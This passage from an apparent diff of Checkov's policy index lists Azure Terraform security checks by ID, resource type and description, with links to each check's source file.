[SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 1276 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) | -| 1277 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) | -| 1278 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) | -| 1279 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1280 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1281 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1282 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) | -| 1283 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1284 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1285 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1286 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1287 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1288 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1289 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | -| 1290 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | -| 1291 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) | -| 1292 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) | -| 1293 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1294 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1295 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1296 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1297 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1298 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1299 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1300 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1301 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1302 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1303 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1304 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1305 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1306 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1307 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1308 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1309 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) | -| 1310 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) | -| 1311 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) | -| 1312 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | -| 1313 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | -| 1314 | CKV_AZURE_78 | resource | azurerm_app_service | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1315 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1316 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1317 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) | -| 1318 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | -| 1319 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | -| 1320 | CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) | -| 1321 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) | -| 1322 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) | -| 1323 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) | -| 1324 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) | -| 1325 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) | -| 1326 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) | -| 1327 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1328 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1329 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1330 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) | -| 1331 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) | -| 1332 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | -| 1333 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | -| 1334 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) | -| 1335 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | -| 1336 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | -| 1337 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 1338 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) | -| 1339 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | -| 1340 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | -| 1341 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) | -| 1342 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) | -| 1343 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) | -| 1344 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) | -| 1345 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) | -| 1346 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) | -| 1347 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) | -| 1348 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) | -| 1349 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) | -| 1350 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) | -| 1351 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) | -| 1352 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) | -| 1353 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) | -| 1354 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) | -| 1355 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) | -| 1356 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) | -| 1357 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) | -| 1358 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) | -| 1359 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) | -| 1360 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) | -| 1361 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) | -| 1362 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) | -| 1363 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | -| 1364 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | -| 1365 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) | -| 1366 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) | -| 1367 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) | -| 1368 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) | -| 1369 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) | -| 1370 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) | -| 1371 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) | -| 1372 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) | -| 1373 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) | -| 1374 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) | -| 1375 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) | -| 1376 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) | -| 1377 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) | -| 1378 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) | -| 1379 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) | -| 1380 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) | -| 1381 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) | -| 1382 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | 